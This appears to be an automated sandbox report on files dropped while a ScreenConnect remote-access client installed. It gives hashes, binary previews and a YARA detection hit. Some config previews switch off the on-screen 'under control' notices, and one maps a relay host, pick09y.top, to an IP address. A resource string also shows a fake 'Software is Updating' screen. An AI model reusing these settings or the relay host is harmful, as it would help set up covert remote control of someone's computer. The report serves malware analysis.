                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):81696
                                                                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):548864
                                                                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1721856
                                                                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):601376
                                                                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):652
                                                                                                                                                                                                Entropy (8bit):4.646296001566109
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                                                                                                                                                MD5:8B45555EF2300160892C25F453098AA4
                                                                                                                                                                                                SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                                                                                                                                                SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                                                                                                                                                SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):21018
                                                                                                                                                                                                Entropy (8bit):7.841465962209068
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                                                                                                                                                MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                                                                                                                                                SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                                                                                                                                                SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                                                                                                                                                SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):50133
                                                                                                                                                                                                Entropy (8bit):4.759054454534641
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):26722
                                                                                                                                                                                                Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3343
                                                                                                                                                                                                Entropy (8bit):4.771733209240506
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                                                                                                                                MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                                                                                                                                SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                                                                                                                                SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                                                                                                                                SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):556
                                                                                                                                                                                                Entropy (8bit):5.0475081892433264
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+L5D/vXbAa3xT:2dL9hK6E46YP07vH
                                                                                                                                                                                                MD5:E607EE31D56CA0747656CAAD9035710C
                                                                                                                                                                                                SHA1:5ABE4CD0836B40D174C891074B05AE252996439B
                                                                                                                                                                                                SHA-256:7ABAC0103AEA4F59C028F64CA0CD3A90A0C5AFBB840BAF12ECE4B68DEC0F100C
                                                                                                                                                                                                SHA-512:FEBEB6289E71EB67C5C6DFE03624692F3AFC7DA3B2217FF77DB70B253EC7F01D233B96B3DC4C354B6421AB9DC2AB20A91AA9D53A2737F7BF42C85DD83135A494
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pick09y.top=62.182.85.100-07%2f11%2f2024%2016%3a56%3a34</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):556
                                                                                                                                                                                                Entropy (8bit):5.0475081892433264
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+L5D/vXbAa3xT:2dL9hK6E46YP07vH
                                                                                                                                                                                                MD5:E607EE31D56CA0747656CAAD9035710C
                                                                                                                                                                                                SHA1:5ABE4CD0836B40D174C891074B05AE252996439B
                                                                                                                                                                                                SHA-256:7ABAC0103AEA4F59C028F64CA0CD3A90A0C5AFBB840BAF12ECE4B68DEC0F100C
                                                                                                                                                                                                SHA-512:FEBEB6289E71EB67C5C6DFE03624692F3AFC7DA3B2217FF77DB70B253EC7F01D233B96B3DC4C354B6421AB9DC2AB20A91AA9D53A2737F7BF42C85DD83135A494
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pick09y.top=62.182.85.100-07%2f11%2f2024%2016%3a56%3a34</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
